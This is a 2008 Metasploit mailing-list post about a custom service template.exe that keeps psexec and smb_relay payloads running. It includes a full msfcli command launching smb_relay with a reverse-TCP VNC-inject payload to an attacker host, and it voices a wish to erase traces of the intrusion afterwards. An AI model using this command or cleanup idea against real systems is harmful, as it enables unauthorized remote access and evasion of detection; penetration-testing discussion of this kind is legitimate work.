Metasploit mailing list archives

NTLM relay implemented in Metasploit 3?

From: sigtrap at sigtrap.org (sigtrap)
Date: Thu, 07 Feb 2008 10:24:11 +0100

Hi,
I have posted a service template.exe to this list before.
I'll post it again because it works as a charm when you look
for "Wireless Zero Configuration" hosts.
The password is 31 characters. Not 8 :-)
Here is my old post:

----------------------------
I now have a new "service template.exe". I managed to steal 10 minutes
from my friend Magnus Br?ding, in which he threw together a service
executable template PoC (yes, we're sorry it's bloated :-)) It's
attached with the password:
"password" (without the quotes)

Got it? ;-)

If you backup the original template.exe and use this instead, the
exploits psexec and smb_relay will work as intended (other exploits,
that don't expect a service exe, probably won't work).

Eg:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7
PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E

The service is created and starts.
The payload is executed in a new thread.
The service controller *doesn't* kill the process after 30 seconds
anymore, as it does with the normal template.exe.
When you terminate the vncclient the payload terminates the process
through the "EXITFUNC=process".
The Windows service MMC snap-in will now report the created service
as "stopped".

If we could now just make the handler (i.e. the one that that starts the
VNC client on the attacking computer) report back to the exploit when
the payload on the victim computer has ended (and thus its process has
also terminated in this case), it would be easy to remove the service
and executable on the victim computer, thereby leaving no bigger trace
behind of the intrusion. I don't know how to do this, but it would be
really great if someone did.

Regards
//Sigtrap